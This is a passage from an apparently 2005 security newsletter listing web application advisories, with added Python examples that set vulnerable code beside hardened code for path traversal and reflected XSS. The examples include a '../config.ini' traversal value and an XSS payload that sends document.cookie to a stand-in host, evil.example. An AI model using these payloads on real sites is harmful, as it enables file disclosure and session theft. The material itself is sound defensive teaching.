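import tempfile

# Constructed fixture: a template directory holding two legitimate
# templates, and a sensitive file one level above it.
ROOT = tempfile.mkdtemp()
TEMPLATE_DIR = os.path.join(ROOT, "templates")
os.makedirs(TEMPLATE_DIR)
for name, body in (("de.tmpl", "Hallo, {user}"), ("en.tmpl", "Hello, {user}")):
    with open(os.path.join(TEMPLATE_DIR, name), "w", encoding="utf-8") as fh:
        fh.write(body)
with open(os.path.join(ROOT, "config.ini"), "w", encoding="utf-8") as fh:
    fh.write("db_password=hunter2")

# Allowlist of template keys the application actually ships.
KNOWN_TEMPLATES = {"de", "en"}
NAME_RE = re.compile(r"^[a-z]{2}$")


def load_template_unsafe(tmpl: str) -> str:
    """Vulnerable pattern: the raw parameter value is joined onto the
    directory and opened, so a value such as '../config.ini' reads a
    file outside TEMPLATE_DIR and returns its contents to the client."""
    with open(os.path.join(TEMPLATE_DIR, tmpl), encoding="utf-8") as fh:
        return fh.read()


def load_template_safe(tmpl: str) -> str:
    """Hardened: the parameter is a key into an allowlist, never a path.
    The realpath containment check is a second, independent guard in
    case the allowlist is later loosened or a symlink appears."""
    if not NAME_RE.match(tmpl) or tmpl not in KNOWN_TEMPLATES:
        raise ValueError("unknown template")
    path = os.path.realpath(os.path.join(TEMPLATE_DIR, tmpl + ".tmpl"))
    base = os.path.realpath(TEMPLATE_DIR) + os.sep
    if not path.startswith(base):
        raise ValueError("template resolves outside the template directory")
    with open(path, encoding="utf-8") as fh:
        return fh.read()


def template_accepted(tmpl: str) -> bool:
    """True if the hardened loader would serve this parameter value."""
    try:
        load_template_safe(tmpl)
        return True
    except (ValueError, OSError):
        return False


if __name__ == "__main__":
    print("unsafe, traversal value :", load_template_unsafe("../config.ini"))
    print("safe,   valid key       :", load_template_safe("de"))
    print("safe,   traversal value :", template_accepted("../config.ini"))
```

The allowlist is the real fix; the realpath check only catches mistakes in
it. Note that the hardened loader never echoes the parameter value into
an error message, which would otherwise turn an "unknown template" page
into a reflected cross-site scripting sink.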
______________________________________________________________________
05.14.32 CVE: Not Available
Platform: Web Application
Title: Comersus Cart Username Field HTML Injection
Description: Comersus Cart is a set of ASP scripts creating an online
shopping cart. A remote HTML injection vulnerability affects Comersus
Cart when a malicious user enters HTML and script code through the
"Username" field of the affected application. Comersus Cart version
6.03 is affected by this issue.
Ref: http://www.comersus.com/index.html
______________________________________________________________________
05.14.33 CVE: Not Available
Platform: Web Application
Title: RunCMS Remote Arbitrary File Upload Vulnerability
Description: RunCMS is a web-based content management system implemented
in PHP. RunCMS is affected by a remote arbitrary file upload
vulnerability. RunCMS versions 1.1A and earlier are known to be
vulnerable.
Ref: http://www.securityfocus.com/archive/1/395097
______________________________________________________________________
05.14.34 CVE: Not Available
Platform: Web Application
Title: Pavuk Multiple Unspecified Vulnerabilities
Description: Pavuk is a web spider application. It is reported to be
vulnerable to multiple unspecified issues due to improper boundary
checks. Pavuk version 0.9.31 is reported to be vulnerable.
Ref: http://www.securityfocus.com/bid/13005
______________________________________________________________________
05.14.35 CVE: Not Available
Platform: Web Application
Title: PHP-Nuke Your_Account Module Avatarcategory Cross-Site
Scripting
Description: PHP-Nuke is a content management system. Insufficient
sanitization of the "Avatarcategory" parameter of the "Your_Account"
module exposes the application to a cross-site scripting issue.
PHP-Nuke versions 7.6 and earlier are affected.
Ref: http://www.securityfocus.com/archive/1/394971
______________________________________________________________________
05.14.36 CVE: Not Available
Platform: Web Application
Title: PHP-Nuke Web_Links Module Multiple Cross-Site Scripting
Vulnerabilities
Description: PHP-Nuke is a content management system. It is vulnerable
to multiple cross-site scripting issues in the "Web_Links" Module. An
attacker may leverage these issues to steal cookie-based
authentication credentials. PHP-Nuke version 7.6 is vulnerable.
Ref: http://www.securityfocus.com/archive/1/394867
______________________________________________________________________
05.14.37 CVE: Not Available
Platform: Web Application
Title: Active Auction House Multiple Cross-Site Scripting
Vulnerabilities
Description: Active Auction House is web-based auction software. It is
reportedly affected by multiple cross-site scripting vulnerabilities. An
attacker can use these to steal cookie-based authentication credentials.
Ref: http://www.securityfocus.com/archive/1/395104
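The PHP-Nuke, Comersus Cart and Active Auction House entries above all
come down to one defect: a request parameter is copied into the page
without output encoding. The example below is added here and is not code
from any of those products; the handler, the "category" and "link"
parameters and the payload are constructed for the example, and it is
written in Python rather than PHP or ASP so it runs stand-alone. It shows
the vulnerable rendering beside a hardened one, and makes two points the
entries only hint at: escaping is context-dependent (an escaped
"javascript:" URL is still a valid href, so URLs need a scheme check, not
just escaping), and the cookie theft the entries describe is blunted by
marking the session cookie HttpOnly.

```python
"""Reflected parameter rendering, vulnerable beside hardened.
Hypothetical handler, not PHP-Nuke, Comersus or Active Auction House
code; parameter names and payloads are constructed for the example."""
import html
from urllib.parse import urlsplit

# Constructed attacker input for a "category" query parameter: closes the
# surrounding tag and ships document.cookie to a third-party host.
PAYLOAD = ('"><script>document.location="http://evil.example/?c="'
           '+document.cookie</script>')
JS_URL = "javascript:alert(document.cookie)"


def render_unsafe(category: str, link: str) -> str:
    """Vulnerable: user input is concatenated straight into markup, in
    both text context (inside <h2>) and attribute context (href)."""
    return (f'<h2>Downloads: {category}</h2>'
            f'<a href="{link}">more</a>')


def safe_url(link: str) -> str:
    """Escaping does not help for href: 'javascript:' survives
    html.escape unchanged. Allow only http(s) and relative URLs, based on
    the parsed scheme so case and leading whitespace do not matter."""
    scheme = urlsplit(link.strip()).scheme.lower()
    if scheme not in ("", "http", "https"):
        return "#"
    return link


def render_safe(category: str, link: str) -> str:
    """Hardened: HTML-escape with quote=True for both text and attribute
    context, and scheme-check the URL before it reaches href."""
    return (f'<h2>Downloads: {html.escape(category, quote=True)}</h2>'
            f'<a href="{html.escape(safe_url(link), quote=True)}">more</a>')


def contains_script(markup: str) -> bool:
    """Crude check used only to compare the two renderers: does the
    output still contain an executable script tag or javascript: href?"""
    low = markup.lower()
    return "<script" in low or 'href="javascript:' in low


def session_cookie_header(token: str) -> str:
    """Defence in depth for the cookie theft the advisories describe:
    HttpOnly keeps the session cookie out of document.cookie, Secure keeps
    it off plaintext HTTP, SameSite limits cross-site sends."""
    return f"Set-Cookie: session={token}; HttpOnly; Secure; SameSite=Lax; Path=/"


if __name__ == "__main__":
    print("unsafe:", render_unsafe(PAYLOAD, JS_URL))
    print("safe  :", render_safe(PAYLOAD, JS_URL))
    print(session_cookie_header("constructed-token"))
```

The escaping belongs at the point of output, not at input time: the same
username or category value may later be emitted into HTML, into a
JavaScript string, or into a URL, and each context needs its own encoder.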
______________________________________________________________________
(c) 2005. All rights reserved. The information contained in this
newsletter, including any external links, is provided "AS IS," with no
express or implied warranty, for informational purposes only. In some
cases, copyright for material in this newsletter may be held by a party
other than Qualys (as indicated herein) and permission to use such
material must be requested from the copyright owner.
==end==
Subscriptions:
RISK is distributed free of charge to people responsible
for managing and securing information systems and networks. You may
forward this newsletter to others with such responsibility inside or
outside your organization.
To subscribe, at no cost, go to https://portal.sans.org where you may
also request subscriptions to any of SANS other free newsletters.
To change your subscription, address, or other information, visit
http://portal.sans.org Copyright 2005. All rights reserved. No posting
or reuse allowed, other than as listed above, without prior written
permission.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (Darwin)
iD8DBQFCVmnT+LUG5KFpTkYRAn/gAJ4y+6gFnZMw0QEKSC/CEFLFEVTnpACeITn4
Tml2+rfa8HWuHkTqBpv+P6o=
=6yk4
-----END PGP SIGNATURE-----